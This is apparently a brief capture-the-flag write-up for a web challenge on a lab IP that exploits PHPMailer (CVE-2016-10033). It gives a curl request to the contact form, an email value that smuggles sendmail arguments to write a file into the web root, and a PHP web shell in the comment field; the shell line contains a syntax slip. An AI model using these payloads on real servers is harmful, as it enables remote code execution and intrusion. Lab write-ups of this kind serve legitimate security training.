2 CV

2 CV

Tags

Web

Solved

DESCRIPTION

Investigate the CV page. Can you find the vulnerability? http://10.12.32.135

QUESTION

Find your way in and read flag from /home/flag.txt

SOLUTION

"Powered by PHPMailer" - find exploits

curl \
  -XPOST \
  http://10.12.32.135/index.php \
  -d action=submit -d name=YEET -d email=YEET@YEET.hub -d message=TEST

Shell

Explot: https://www.fortinet.com/blog/threat-research/analysis-of-phpmailer-remote-code-execution-vulnerability-cve-2016-10033 

Name: asd
Email: "attacker\" -oQ/tmp -X/www/test.php some"@examble.com
Comment: <?php if(isset($_REQUEST['cmd'])){$cmd=($_REQUEST["cmd"); system($cmd); echo "$cmd"; die;}?>

Bash